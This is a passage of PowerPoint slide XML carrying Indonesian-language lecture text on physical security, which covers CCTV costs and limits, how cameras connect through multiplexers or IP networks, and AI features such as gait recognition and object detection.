              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>murah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disiapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastrukturnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>belum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cukup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keuntungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Adalah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pergerakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>direkam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibandingkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kehadiran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>petugas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lama, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terganggu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cukup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>staf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kamera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Kamera </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CCTV </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>multiplekser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koaksial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Multiplekser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menampilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gambar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kamera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> operator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kamera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merekam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gambar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kaset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hard drive. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kamera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihubungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kamera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>robotika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> AI dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembelajaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cerdas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (theverge.com/2018/1/23/16907238/ artificial-intelligence-surveillance-cameras-security):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pengenalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Gerakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apabila</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kamera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peringatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlihat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kamera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergerak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>individu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikenal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berwenang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Deteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Objek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-Terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kamera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
